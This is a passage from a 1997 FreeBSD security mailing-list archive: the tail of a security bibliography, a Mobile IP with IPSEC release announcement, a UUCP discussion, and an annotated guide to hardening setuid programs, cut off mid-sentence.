http://sw.cse.bris.ac.uk/public/Xsecurity.html. > > Security in Open Systems. (NIST) John Barkley, Editor. (With Lisa > Carnahan, Richard Kuhn, Robert Bagwill, Anastase Nakassis, Michael > Ransom, John Wack, Karen Olsen, Paul Markovitz and Shu-Jen Chang.) US > Department of Commerce. Section: The X Window System: Bagwill, Robert. > http://csrc.ncsl.nist.gov/nistpubs/800-7/node62.html#SECTION06200000000000000000. > > Security Enhancements of the DEC MLS+ System; The Trusted X Window > System. November, 1995. > http://ftp.digital.com/pub/Digital/info/SPD/46-21-XX.txt > > Evolution of a Trusted B3 Window System Prototype. J. Epstein, J. Mc > Hugh, R.Psacle, C. Martin, D. Rothnie, H. Orman, A. Marmor-Squires, > M.Branstad, and B. Danner, , In > Proceeding of the 1992 IEEE Symposium on Security and Privacy, 1992. > > A Prototype B3 Trusted X Window System. J. Epstein, J. Mc Hugh, R. > Pascale, H. Orman, G. Benson, C.Martin, A. Marmor-Squires, B.Danner, and > M. Branstad, The Proceedings of the 7th Computer Security Applications > Conference, December, 1991. > > Improving X Windows Security. UNIX World, (Volume IX, Number 12) > December 1992. Linda Mui. > > Security and the X Window System. UNIX World, 9(1), p. 103. January > 1992. Dennis Sheldrick. > > The X Window System. Scheifler, Robert W. & Gettys, Jim. ACM > Transactions on Graphics. Vol.5, No. 2 (April 1986), pp. 79-109. > http://www.acm.org/pubs/toc/Abstracts/0730-0301/24053.html. > > X Window Terminals. Digital Technical Journal of Digital Equipment > Corporation, 3(4), pp. 26-36, Fall 1991. Björn Engberg and Thomas > Porcher. > ftp://ftp.digital.com/pub/Digital/info/DTJ/v3n4/X_Window_Terminals_01jul1992DTJ402P8.ps. > > Information Security: Computer Attacks at Department of Defense Pose > Increasing Risks; General Accounting Office. Report on Failed Security > at US Defense Sites. > http://www.epic.org/security/GAO_OMB_security.html > > Defense Directive 5200.28. "Security requirements for Automated > Information Systems." Document describing some antiquated government > standards for security. > http://140.229.1.16:9000/htdocs/teinfo/directives/soft/5200.28.html > > The Evaluated Products List (EPL). A list of products that have been > evaluated for security ratings, based on DOD guidelines. > http://www.radium.ncsc.mil/tpep/epl/index.html > > INTERNIC, or the Network Information Center. INTERNIC provides > comprehensive databases on networking information. These databases > contain the larger portion of collected knowledge on the design and > scope of the Internet. (Of main importance here is the database of RFC > documents.) > http://ds0.internic.net/ds/dspg1intdoc.html > > The Rand Corporation. Security resources of various sorts. Also: very > engrossing "early" documents on the Internet’s design. > http://www.rand.org/publications/electronic/ > > Connected: An Internet Encyclopedia. (Incredible on-line resource for > RFC documents and related information, apparently painstaking translated > into HTML.) > http://www.freesoft.org/Connected/RFC/826/ > > The Computer Emergency Response Team. (CERT) An organization that > assists sites in responding to network security violations, break-ins > and so forth. Great source of information, particularly for > vulnerabilities. > http://www.cert.org. > > Security Survey of Key Internet Hosts & Various Semi-Relevant > Reflections. D. Farmer. Fascinating independent stud conducted by one of > the authors of the now famous SATAN program. The survey involved > approximately 2200 sites. The results are disturbing. > http://www.trouble.org/survey/ > > CIAC. (U.S. Department of Energy's Computer Incident Advisory > Capability.) The CIAC provides computer security services to employees > and contractors of the United States Department of Energy, but the site > is open to the public as well. There are many tools and documents at > this location. > http://ciac.llnl.gov/ > > The National Computer Security Association. This site contains a great > deal of valuable security information, including reports, papers, > advisories and analyses of various computer security products and > techniques. > http://www.ncsa.com/ > > Short Courses in Information Systems Security at George Mason > University. This site contains information about security courses. > Moreover, there are links a comprehensive bibliography of various > security related documents. > http://www.isse.gmu.edu:80/~gmuisi/ > > NCSA RECON. Spooks on the Net. The National Computer Security > Association’s "special" division. They offer a service where one can > search through thousands of downloaded messages passed amongst hackers > and crackers on BBS boards and the Internet. An incredible security > resource, but a commercial one. > http://www.isrecon.ncsa.com/public/faq/isrfaq.htm > > Lucent Technologies. Courses on security from the folks who really know > security. > http://www.attsa.com/ > > Massachusetts Institute of Technology distribution site for United > States residents for Pretty Good Privacy (PGP). PGP provides some of the > most powerful, military grade encryption currently available. > http://web.mit.edu/network/pgp.html > > The Anonymous Remailer FAQ. A document that covers all aspects of > anonymous remailing techniques and tools. > http://www.well.com/user/abacard/remail.html > > The Anonymous Remailer List. A comprehensive but often changing > (dynamic) list of anonymous remailers > http://www.cs.berkeley.edu/~raph/remailer-list.html > > Microsoft ActiveX Security. This page addresses the security features of > ActiveX. > http://www.microsoft.com/intdev/signcode/ > > Purdue University COAST Archive. One of the more comprehensive security > sites, containing many tools and documents of deep interest within the > security community. > http://www.cs.purdue.edu//coast/archive/ > > Raptor Systems. Makers of one of the better firewall products on the Net > have established a fine security library. > http://www.raptor.com/library/library.html > > The Risks Forum. A moderated digest of security and other risks in > computing. A great resource that is also searchable. You can tap the > better security minds on the Net. > http://catless.ncl.ac.uk/Risks > > FIRST. (Forum of Incident Response and Security Teams). A conglomeration > of many organizations undertaking security measures on the Internet. A > powerful organization and good starting place for sources. > http://www.first.org/ > > The CIAC Virus Database. The ultimate virus database on the Internet. An > excellent resource to learn about various viruses that can effect your > platform. > http://ciac.llnl.gov/ciac/CIACVirusDatabase.html > > Information Warfare and Information Security on the Web. A comprehensive > lost of links and other resources concerning Information Warfare over > the Internet. > http://www.fas.org/irp/wwwinfo.html > > Criminal Justice Studies of the Law Faculty of University of Leeds, The > United Kingdom. Site with interesting information on cryptography and > civil liberties. > http://www.leeds.ac.uk/law/pgs/yaman/cryptog.htm. > > Federal Information Processing Standards Publication documents. > (Government guidelines.) National Institute of Standards and Technology > reports on DES encryption and related technologies. > http://csrc.nist.gov/fips/fips46-2.txt > > Wordlists available at NCSA and elsewhere. (For use in testing the > strength of, or "cracking" UNIX passwords.) > http://sdg.ncsa.uiuc.edu/~mag/Misc/Wordlists.html. > > Department of Defense Password Management Guideline. (Treatment of > password security in classified environments.) > http://www.alw.nih.gov/Security/FIRST/papers/password/dodpwman.txt > > Dr. Solomon’s. A site filled with virus information. Anyone concerned > with viruses (or anyone who just wants to know more about virus > technology,) should visit Dr. Solomon’s site. > http://www.drsolomon.com/vircen/allabout.html > > The Seven Locks server. An eclectic collection of security resources, > including a number of papers that cannot be found elsewhere! > http://www.sevenlocks.com/CIACA-10.htm.[m1] > > S/Key informational page. Provides information on S/Key and use of one > time passwords in authentication. > http://medg.lcs.mit.edu/people/wwinston/skey-overview.html. > A page devoted to ATP, the "Anti-Tampering Program". (In some ways, > similar to Tripwire or Hobgoblin.) > http://www.cryptonet.it/docs/atp.html > > Bugtraq Archives. An archive of the popular mailing list, Bugtraq. This > is significant because Bugtraq is one of the most reliable source for > up-to-date reports on new found vulnerabilities in UNIX (and at times, > other operating systems.) > http://geek-girl.com/bugtraq/ > > Wang Federal. This company produces very high quality security operating > systems and other security solutions. They are the leader in TEMPEST > technology. > http://www.wangfed.com > > The Center for Secure Information Systems. This site, affiliated with > the Center at George Mason University, has some truly incredible papers. > There is much research going on here; research of a cutting edge nature. > The link below send you directly to the publications page, but you > really should explore the entire site. > http://www.isse.gmu.edu/~csis/publication.html > > SRI International. Some very highbrow technical information. The > technical reports here are of extreme value. However, you must have at > least a fleeting background in security to even grasp some of the > concepts. Nevertheless, a great resource. > http://www.sri.com/ > > The Security Reference Index. This site, maintained by the folks at > telstra.com, is a comprehensive pointer page to many security resources. > http://www.telstra.com.au/info/security.html > > Wietse Venema’s Tools Page. This page, Maintained by Wietse Venema > (co-author of SATAN and author of TCP_Wrapper and many, other security > tools), filled papers, tools and general information. It is a must-visit > for any UNIX system administrator. > ftp://ftp.win.tue.nl/pub/security/index.html > > United States. Congress. House. Committee on Science, Space, and > Technology. Subcommittee on Science. Internet security : Hearing Before > the Subcommittee on Science of the Committee on Science, Space, and > Technology. U.S. House of Representatives, One Hundred Third Congress, > second session, March 22, 1994. Washington. U.S. G.P.O. For sale by > the U.S. G.P.O., Supt. of Docs., Congressional Sales Office, 1994. > > UNIX Unleashed. SAMS Publishing, 1994. ISBN: 0-672-30402-3. > > Internet QuickKIT. Brad Miser. HAYDEN. ISBN: 1568302401 > > Bots and Other Internet Beasties. SAMS.NET. Joseph Williams. ISBN: > 1575210169 (1996) > > The Internet Unleashed 1996. SAMS.NET. SAMS Development Group. ISBN: > 157521041X. (1995) > Microsoft Internet Information Server 2 Unleashed. Arthur Knowles. > SAMS.NET. ISBN: 1575211092. (1996) > > Designing and Implementing Microsoft Internet Information Server. > SAMS.NET. ISBN: 1575211688. (1996) > > Internet Research Companion. Que Education and Training. Geoffrey McKim. > ISBN: 1575760509. (1996) > > An Interactive Guide to the Internet. Que Education and Training. J. > Michael BLocher, Vito Amato & Jon Storslee. ISBN: 1575763540. (1996) > > Internet Security for Business. New York. Wiley, 1996. xi, 452 p. : > ill. ; 24 cm. LC CALL NUMBER: HD30.38 .I57 1996 > > Managing Windows NT Server 4. NRP. Howard F. Hilliker. ISBN: 1562055763. > (1996) > Internet 1997 Unleashed, Second Edition. SAMS.NET. Jill Ellsworth, Billy > Barron, et al. ISBN: 1575211858. (1996) > > Windows NT Server 4 Security, Troubleshooting, and Optimization. NRP. > ISBN: 1562056018. (1996) > > Apache Server Survival Guide. SAMS.NET. Manuel Alberto Ricart. ISBN: > 1575211750. (1996) > Internet Firewalls and Network Security, Second Edition. NRP. Chris Hare > and Karanjit S. Siyan, Ph.D. ISBN: 1562056328. (1996) > > PC Week Intranet and Internet Firewalls Strategies. ZDPRESS. Ed Amoroso > & Ronald Sharp. ISBN: 1562764225. (1996) > > Internet Security Professional Reference. NRP. Chris Hare, et al. ISBN: > 1562055577. (1996) > > NetWare Security. NRP. William Steen. ISBN: 1562055453. (1996) > Internet Security Resource Library. NRP. Box-set. ISBN: 1562055062. > (1996) > > LINUX System Administrator's Survival Guide. SAMS. Timothy Parker, Ph. > D. ISBN: 0672308509. (1996) > > Internet Commerce. NRP. Andrew Dahl and Leslie Lesnick. ISBN: > 1562054961. (1995) > Windows NT Server 4 Security, Troubleshooting, and Optimization. NRP. > ISBN: 1562056018. (1996) > > E-Mail Security: How To Keep Your Electronic Messages Private. Bruce > Schneier. John Wiley & Sons Inc. 605 Third Ave. New York, NY 10158. > ISBN: 0-471-05318-X > > Protection and Security on the Information Superhighway. Frederick B. > Cohen. John Wiley & Sons Inc. 605 Third Ave. New York, NY 10158. ISBN: > 0-471-11389-1 > > Firewalls and Internet Security: Repelling the Wily Hacker. William R. > Cheswick and Steven M. Bellovin. Addison-Wesley Publishing Co. 1 Jacob > Way Reading, MA 01867. ISBN: 0-201-63357-4 > > Practical UNIX & Internet Security, 2nd Edition. Simson Garfinkel & Gene > Spafford. 2nd Edition April 1996. 1-56592-148-8. > > UNIX System Security. David A. Curry. Addison Wesley Publishing Company, > Inc. 1992. ISBN 0-201-56327-4 > > Secure UNIX. Samuel Samalin. McGraw Hill. December 1996. ISBN: > 0070545545 > Security (Openframework Systems Architecture). Belinda Fairthorne. > Prentice Hall. Publication date: March 1993. ISBN: 0136306586 > > The Underground Guide to UNIX : Slightly Askew Advice from a UNIX Guru. > John Montgomery. Addison-Wesley Pub Co. 1995. ISBN: 0201406535 > > UNIX Installation Security and Integrity. David Ferbrache, Gavin > Shearer. Prentice Hall. 1993. ISBN: 0130153893 > > UNIX Security : A Practical Tutorial (UNIX/C). N. Derek Arnold. > McGraw-Hill. 1993. ISBN: 0070025606 > > UNIX System Security Essentials. Christoph Braun, Siemens Nixdorf. > Addison-Wesley Pub Co. 1995. IBN: 0201427753 > > UNIX System Security : How to Protect Your Data and Prevent Intruders. > Rik Farrow, Rick Farrow. Addison-Wesley Pub Co. 1991. ISBN: 0201570300 > > UNIX Security Symposium IV Proceedings/October 4-6, 1993 Santa Clara, > California, USA. Usenix Assoc. ISBN: 1880446553 > > -- > -- Phil > > -[ Philippe Regnauld / Systems Administrator / regnauld@prosa.dk ]- > -[ Location.: +55.4N +11.3E PGP Key: finger regnauld@hotel.prosa.dk ]- > From owner-freebsd-security Fri Aug 1 11:13:33 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA03634 for security-outgoing; Fri, 1 Aug 1997 11:13:33 -0700 (PDT) Received: from jli.com (jli.com [199.2.111.1]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id LAA03627 for ; Fri, 1 Aug 1997 11:13:29 -0700 (PDT) Received: from cumulus by jli.com with uucp (Smail3.1.29.1 #3) id m0wuMC9-0002TOC; Fri, 1 Aug 97 11:12 PDT Message-Id: To: security@freebsd.org From: Bill Trost Subject: Mobile IP for FreeBSD from Portland State University MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <668.870458449.1@cloud.rain.com> Date: Fri, 01 Aug 1997 11:00:50 -0700 Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Portland State University's newest release of Mobile IP for FreeBSD is now available. This release combines Mobile IP routing with IPSEC security. Mobile IP is a network protocol that allows hosts ("mobile nodes") to change their point of Internet connectivity without having to change their IP address. ftp://ftp.cs.pdx.edu/pub/mobile/mip-July97.tar.gz contains the release. It includes kernel sources based on FreeBSD 2.2.1 and PAO-970331, including ISA and PCMCIA WaveLAN drivers, source code for Mobile IP utilities and daemons, and binaries of all the user-level programs. Portions of the release are export controlled. They can only be downloaded by filling out a form at http://web.mit.edu/network/isakmp/isakmpform.html. New in this release: * IPSEC support within the Mobile IP daemons. All traffic between mobile nodes and their home agents may be encrypted, essentially creating a virtual private network. Foreign agents are not involved in the IPSEC security associations, but are tunneled over. In this release, encryption is supported only when the mobile node is at a foreign agent unless PSU's ad hoc mode; in that case, encryption may be used when the mobile node is at its home agent as well as at foreign agents. Also, foreign agents may require home agents to authenticate IPIP packets they send, preventing attackers from using foreign agents to circumvent a firewall. * Ported to FreeBSD 2.2.1. * Interoperability fixes from the interoperathon tests sponsored by FTP Inc. shortly before the Memphis IETF meeting. * Numerous bug fixes. Noteworthy properties of PSU's implementation in general: * Foreign agent switching based on WaveLAN signal strength (other link layer technologies are supported, but switching is less intelligent). * An optional replacement for ARP called "ad hoc" mode that eliminates ARP spoofing attacks. In this mode, logical networks are defined by a shared secret key, and every host regularly broadcasts its MAC->IP address binding. This mode also permit mobile nodes to communicate with each other directly, even if no foreign or home agents can be accessed. * Minimal kernel changes that provide basic, general-purpose mechanisms upon which Mobile IP daemons are implemented. * Foreign agents can have mobile security associations with both mobile nodes and home agents, as described in the RFC. * X-based user interface to monitor and control the mobile node. * Both multicast and broadcast agent advertisements. * ISA and PCMCIA WaveLAN drivers and applications to configure them. * NRL's IPSEC, ported to FreeBSD, with extensions to allow IPSEC security associations to be bound to routes. This allows virtual private networks to be created by simply configuring the routing table appropriately. From owner-freebsd-security Fri Aug 1 22:01:32 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA02161 for security-outgoing; Fri, 1 Aug 1997 22:01:32 -0700 (PDT) Received: from python.shoal.net.au (perrya@python.shoal.net.au [203.26.44.5]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA02150 for ; Fri, 1 Aug 1997 22:01:24 -0700 (PDT) Received: from localhost (perrya@localhost) by python.shoal.net.au (8.8.6/8.8.5) with SMTP id PAA04620; Sat, 2 Aug 1997 15:00:35 +1000 (EST) Date: Sat, 2 Aug 1997 15:00:34 +1000 (EST) From: Andrew To: yossman cc: freebsd-security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk So write one :-) I'm sure that if you wrote the things you do and submitted it for comment you could end up with a relatively complete document. Probably wouldn't be a substitute for reading a few of the recommended books but it might be somewhere to start. Andrew Perry andrew@shoal.net.au On Thu, 31 Jul 1997, yossman wrote: > On Tue, 29 Jul 1997 sthaug@nethelp.no wrote: > > > I like the FreeBSD distributions - but I would be much happier if there > > was an easy way to make a system more secure. For instance a document > > which told you: > > > > - These files are only necessary if you need functionality X (uucp is > > an example here). If you don't need functionality X, they can be safely > > removed. > > [...] > > i would be VERY happy if such a document was released and was reasonably > complete. setting up a new unix machine takes me at least a week of > futzing around with security-related issues before i'm satisfied it's > ready to be used with some assurance it's not going to be easily broken. > having such a document as an additional information source would be > awesome. > > > yossman > > ------------------------------------------------------------------------ > Yossarian Holmberg (yossman) yossman@canweb.net > System Administrator, National Online http://www.canweb.net/~yossman/ > my statements are my own, not my employer's -- i do not speak for them. > > '... and if i die, before i learn to speak .. can money pay for all the > days i've lived awake but half asleep?' -- Primitive Radio Gods, > "Standing Outside a Broken Phone Booth With Money In My Hand" > > > From owner-freebsd-security Fri Aug 1 22:38:14 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA03404 for security-outgoing; Fri, 1 Aug 1997 22:38:14 -0700 (PDT) Received: from dog.farm.org (gw-serial2.farm.org [207.111.140.45]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA03364 for ; Fri, 1 Aug 1997 22:37:03 -0700 (PDT) Received: (from dk@localhost) by dog.farm.org (8.7.5/dk#3) id WAA14747; Fri, 1 Aug 1997 22:33:14 -0700 (PDT) Date: Fri, 1 Aug 1997 22:33:14 -0700 (PDT) From: Dmitry Kohmanyuk Message-Id: <199708020533.WAA14747@dog.farm.org> To: peter@grendel.IAEhv.nl (Peter Korsten) Cc: freebsd-security@freebsd.org Subject: Re: Keep UUCP (Was: Re: security hole in FreeBSD) Newsgroups: cs-monolit.gated.lists.freebsd.security Organization: FARM Computing Association Reply-To: dk+@ua.net X-Newsreader: TIN [version 1.2 PL2] Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In article <19970731014354.30839@grendel.IAEhv.nl> you wrote: > Jay D. Nelson shared with us: > > Sometimes I think we can be too "internet-centric" for our own > > good. UUCP makes good security and economic sense. > > > > [lotsa points deleted] > > > > Make it an install option if you want, but leave it as a part of the > > standard distribution. > I can only agree with this. As long as queued SMTP isn't commonly > used, keep UUCP. (And then there's the News thing, too.) also, why you folks think uucp is only for e-mail? it's also a nice remote batch executition environment. (works over TCP, too.) Consider: uux 'host1!prog -flags' 'host2!file1' 'host3!file2' (I actually use it this way.) > For a non-connected host, who wants to use standard mailers like > Mutt or Elm, there's no real alternative. I have set up a network in university to use uucp backup for mail with dial-out when leased line came down on weekends... It still works. -- "The number of Unix installations has grown to 10, with more expected" - The Unix Programmer's Manual, 2nd Edition, June, 1972 From owner-freebsd-security Fri Aug 1 23:42:18 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA05764 for security-outgoing; Fri, 1 Aug 1997 23:42:18 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA05758 for ; Fri, 1 Aug 1997 23:42:16 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.8.5/8.8.5) with UUCP id AAA03537 for freebsd-security@FreeBSD.ORG; Sat, 2 Aug 1997 00:42:14 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with SMTP id AAA08077 for ; Sat, 2 Aug 1997 00:40:51 -0600 (MDT) Date: Sat, 2 Aug 1997 00:40:50 -0600 (MDT) From: Marc Slemko To: freebsd-security@FreeBSD.ORG Subject: Re: Minimum files for operation In-Reply-To: <199706270133.SAA25974@kirk.edmweb.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Thu, 26 Jun 1997, Steve wrote: > There was a post to this list briefly explaining the functions of most > of the suid programs... Check the archives for a message from Marc > Slemko, subject "setuid programs in freebsd". It is included below. It is out of date. Some of the comments are not quite right. It is no longer complete. I don't have time to update it and haven't even looked at it for a long time. I was planning a nice menu-driven program to allow people to tighten down the security of their system, but other things came up and those other things will occupy all my spare development time for the forseeable future. $Id: setuid.txt,v 1.3 1996/09/30 03:41:30 marcs Exp marcs $ 7681 240 -r-sr-xr-x 1 uucp bin 110592 Jul 16 20:17 ./usr/bin/cu 7682 152 -r-sr-xr-x 1 uucp bin 77824 Jul 16 20:17 ./usr/bin/uucp 7684 72 -r-sr-xr-x 1 uucp bin 36864 Jul 16 20:17 ./usr/bin/uuname 7687 168 -r-sr-xr-x 1 uucp bin 86016 Jul 16 20:17 ./usr/bin/uustat 7689 160 -r-sr-xr-x 1 uucp bin 81920 Jul 16 20:18 ./usr/bin/uux 99849 400 -r-sr-xr-x 1 uucp bin 196608 Jul 16 20:17 ./usr/libexec/uucp/uucico 99850 176 -r-sr-x--- 1 uucp uucp 90112 Jul 16 20:18 ./usr/libexec/uucp/uuxqt USE: Used by uucp. IMPACT: If you are not using uucp on your system, removing the setuid flag from uucp, uuname, uustat, uux, uuxqt and uucico will have no impact on the functionality of your system. If you use cu for accessing ports, removing the setuid flag may or may not affect its use depending on how use use it. If you are using uucp, there is no easy way, and arguable no need, to remove the setuid flag. COMMENTS: Since they are setuid uucp and not root, a security hole would only result in someone gaining access to the uucp user. If you are using uucp, compromizing the uucp user means that all your uucp traffic can be compromised. If you aren't using uucp, compromising the uucp user means that, on systems using the default permissions for /dev/cua*, access to any serial devices on the systems will be gained. If those devices include modems, long distance phone calls could be made. 7745 576 ---s--x--x 2 root bin 286720 Jul 16 20:21 ./usr/bin/suidperl 7745 576 ---s--x--x 2 root bin 286720 Jul 16 20:21 ./usr/bin/sperl4.036 suidperl and sperl4.036 are both links to the same file. suidperl should be taken to refer to both suidperl and sperl4.036. If you installed perl5, there will also be suidperl and sperl* in /usr/local/bin; the same comments apply to them. USE: suidperl is a part of perl that allows for secure execution of setuid and setgid perl scripts. Traditionally, setuid and setgid scripts have been insecure due to a race condition when executing the script. suidperl provides a workaround. See the perlsec(1) (in perl 5) or perl(1) (in perl 4; under the 'Setuid Scripts' section; the perl 4 man page is quite incomplete in this regard, so you probably want to use the perl5 one) man page for more details. IMPACT: Removing the setuid flag from suidperl will mean that setuid or setgid perl scripts will no longer work. Most people don't use them, so for most people this is of little consequence. COMMENTS: There was a rather large security hole discovered in suidperl soon before the 2.1.5 release that allowed any user to gain root access on many systems with suidperl installed. FreeBSD 2.1.0 was vulerable; 2.1.5 is not. If you are still running a 2.1.0 system and have not fixed suidperl, take the suid flag off suidperl and sperl* immediately and find out more about the problem. Although, as far as anyone knows, suidperl is now secure, I would advise removing the setuid flags from all copies of 'sperl*' and 'suidperl' on your system if you don't use setuid or setgid perl scripts. 7772 40 -r-sr-xr-x 4 root bin 20480 Jul 16 20:28 ./usr/bin/at 7772 40 -r-sr-xr-x 4 root bin 20480 Jul 16 20:28 ./usr/bin/atq 7772 40 -r-sr-xr-x 4 root bin 20480 Jul 16 20:28 ./usr/bin/atrm 7772 40 -r-sr-xr-x 4 root bin 20480 Jul 16 20:28 ./usr/bin/batch at, atq, atrm and batch are links to the same file. USE: Used to schedule jobs in a similar way to cron, except designed more for non-repeating one time jobs. IMPACT: Removing the setuid flag results in users other than root being unable to use at. 7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/chpass 7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/chfn 7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/chsh 7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/ypchpass 7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/ypchfn 7782 48 -r-sr-xr-x 6 root bin 24576 Jul 16 20:29 ./usr/bin/ypchsh chpass, chfn, chsh, ypchpass, ypchfn and ypchsh are links to the same file. USE: Used to change various information in the password file. IMPACT: If the setuid flag is removed, users will be unable to change information in the password file. 7836 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:30 ./usr/bin/keyinit USE: Used by the S/Key authentication system to initialize the use of S/Key one time passwords for logins. IMPACT: Removing the setuid flag from keyinit means that the S/Key authentication system will no longer be functional on your system. COMMENTS: *** Pointer to S/Key info. *** Does S/Key need to be setuid root? 7843 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:30 ./usr/bin/lock USE: Allows the user to 'lock' their terminal from being used until either the given password or login password (depending on command line options) is given or the program times out. IMPACT: *** None?!?! (won't let user use login password to disable) COMMENTS: *** error in source --> no root password 7845 40 -r-sr-xr-x 1 root bin 20480 Jul 16 20:30 ./usr/bin/login USE: Used by many programs in the login name to authenticate by username and password. Can also be used by a user already logged in to get a new login prompt if they wish to login again, possibly as another user. IMPACT: Removing the setuid flag from login results in people who are already logged in being unable to run login to get a new login prompt. For most systems this is not a problem, and many Unixes even ship without login setuid. COMMENT: Although login should be quite secure, and does run as root anyway from programs such as telnetd, removing the setuid flag has so few side effects that it is worthwhile doing if acceptable in your situation. 7868 40 -r-sr-xr-x 2 root bin 20480 Jul 16 20:30 ./usr/bin/passwd 7868 40 -r-sr-xr-x 2 root bin 20480 Jul 16 20:30 ./usr/bin/yppasswd passwd and yppasswd are links to the same file. USE: Allows users to change their password. IMPACT: Removing the setuid flag from passwd means that users will be unable to change their passwords. There are few environments in which this is practical. COMMENTS: This is one of the things that it is reasonable to require a program that is setuid root to do. People interested in increasing the security of user passwords should look at something like ANLpasswd which checks user passwords in an attempt to encourage the user to choose a secure password. *** add pointer to more info 7873 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:30 ./usr/bin/quota USE: Displays information about users' disk usage and limits. IMPACT: Removing the setuid flag means that only users with access to read quota.user on the relevant partition will be able to get quota information. If you aren't using quotas, removing the setuid flag will have no impact on operations. COMMENTS: *** why is it setuid root? why not setgid something? 7875 88 -r-sr-xr-x 1 root bin 45056 Jul 16 20:30 ./usr/bin/rdist USE: rdist is a program that allows for automated remote file distribution. IMPACT: Removing the setuid flag means that only root will be able to use rdist. If you aren't using rdist, removing the setuid flag will have no impact on operations. COMMENTS: There was a rather large security hold discovered in rdist soon before the 2.1.5 release that allowed any user to gain root access on most systems with rdist installed. FreeBSD 2.1.0 is vulnerable; 2.1.5 is not. If you are still running a 2.1.0 system and have not fixed fdist, take the suid flag off rdist immediately and find out more about the problem. Although, as far as anyone knows, the current rdist is secure, I would recommend removing the setuid flag from rdist. If you requre the functionality provided by rdist, there is a rdist-6.1.2 package/port which uses rsh; since it uses rsh and does not call rcmd(3) directly, it does not need to be setuid root. Also note that both versions of rdist use host based security, which has some quite serious flaws. It is possible to make ssh work with the rdist-6.1.2 package; that is strongly recommended if you need to use rdist. 7878 32 -r-sr-xr-x 1 root bin 16384 Jul 16 20:30 ./usr/bin/rlogin USE: rlogin allows you to login remotely to a machine over the network. IMPACT: removing the setuid flat from rlogin means that users other than root will be unable to use rlogin to connect to remote hosts. COMMENTS: There was a security hole in rlogin that was patched soon after the 2.1.5 release. I have not investigated it in depth, nor have I heard of any exploits for it, but it is possible that the hole discovered could allow others to gain root access to your system. *** more info, pointer to fixed binary? In many environments, rlogin can not be disabled without having an unacceptable impact on system usability. ** add not on rlogin and host based auth in general? 7882 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:31 ./usr/bin/rsh USE: rsh is similar to rlogin in that it allows remote execution of commands, however rsh can not be used with interactive commands. *** fix up IMPACT: removing the setuid flag from rsh means that users other than root will be unable to use rsh to connect to remote hosts. COMMENTS: In many environments, rsh can not be disabled without having an unacceptable impact on system usability. 7901 24 -r-sr-xr-x 1 root bin 12288 Jul 16 20:31 ./usr/bin/su USE: su is used to switch the user you are running as. It can be used by those in group wheel to switch to the root user (uid 0), and by others to switch to other users. Authentication is by password. IMPACT: removing the setuid flag from su means that users other than root will be unable to use su to switch to other users. COMMENTS: In most cases, unless some alternative such as sudo is being used, removing the setuid flag from su is a very bad idea since it means people need to login as root directly to do things requiring superuser privleges. In many environments, an acceptable alternative is to chgrp su to group wheel and take away execute permission to people not in group wheel. This means that while people in group wheel can still use su to switch users, others will be unable to use it. To some, this is viewed as being desirable in itself, regardless of other security improvements that it may make. 7960 48 -r-sr-xr-x 1 root bin 24576 Jul 16 20:33 ./usr/bin/crontab USE: crontab is used by users to edit their crontab files. IMPACT: removing the setuid flag from crontab means that users other than root will be unable to modify their crontabs. COMMENTS: At some sites, local policy is to not let users have their own crontabs. If this is the case, it can be worthwhile to make a seperate group for those users allowed to have crontabs and only allow users in that group to run crontab. 7964 32 -r-sr-sr-x 1 root daemon 16384 Jul 16 20:33 ./usr/bin/lpq 7965 40 -r-sr-sr-x 1 root daemon 20480 Jul 16 20:33 ./usr/bin/lpr 7966 32 -r-sr-sr-x 1 root daemon 16384 Jul 16 20:33 ./usr/bin/lprm USE: All part of the BSD line printer system used for print queueing, both locally and to and from remote hosts. IMPACT: removing the setuid and setgid flags from the above three utilities means that users other than root will be unable to execute them to submit or remove print jobs. There is an associated program called lpc that is setgid daemon and which can be used, by authorized users, to control print queuing. On hosts that do not use this system for print queueing, removing the setuid and setgid flags will have no impact. COMMENTS: Although lpd and associated programs do not have any currently known problems, I hesitate to trust them. There is no real need for such a program to run as root most of the time. If you don't use them, disable them. If you do need the functionality that they provide, I suggest you take a look at LPRng (which originates from PLP). LPRng is a much more secure replacement to lpd and associated programs that also adds numerous features. It is available at ftp://dickory.sdsu.edu/pub/LPRng. 7967 496 -r-sr-xr-x 3 root bin 245760 Jul 16 20:37 ./usr/bin/newaliases 7967 496 -r-sr-xr-x 3 root bin 245760 Jul 16 20:37 ./usr/bin/mailq 7967 496 -r-sr-xr-x 3 root bin 245760 Jul 16 20:37 ./usr/sbin/sendmail These three programs are links to the same file. USE: Sendmail is a full featured SMTP transport program. IMPACT: Removing the setuid flags from these programs, without some fairly 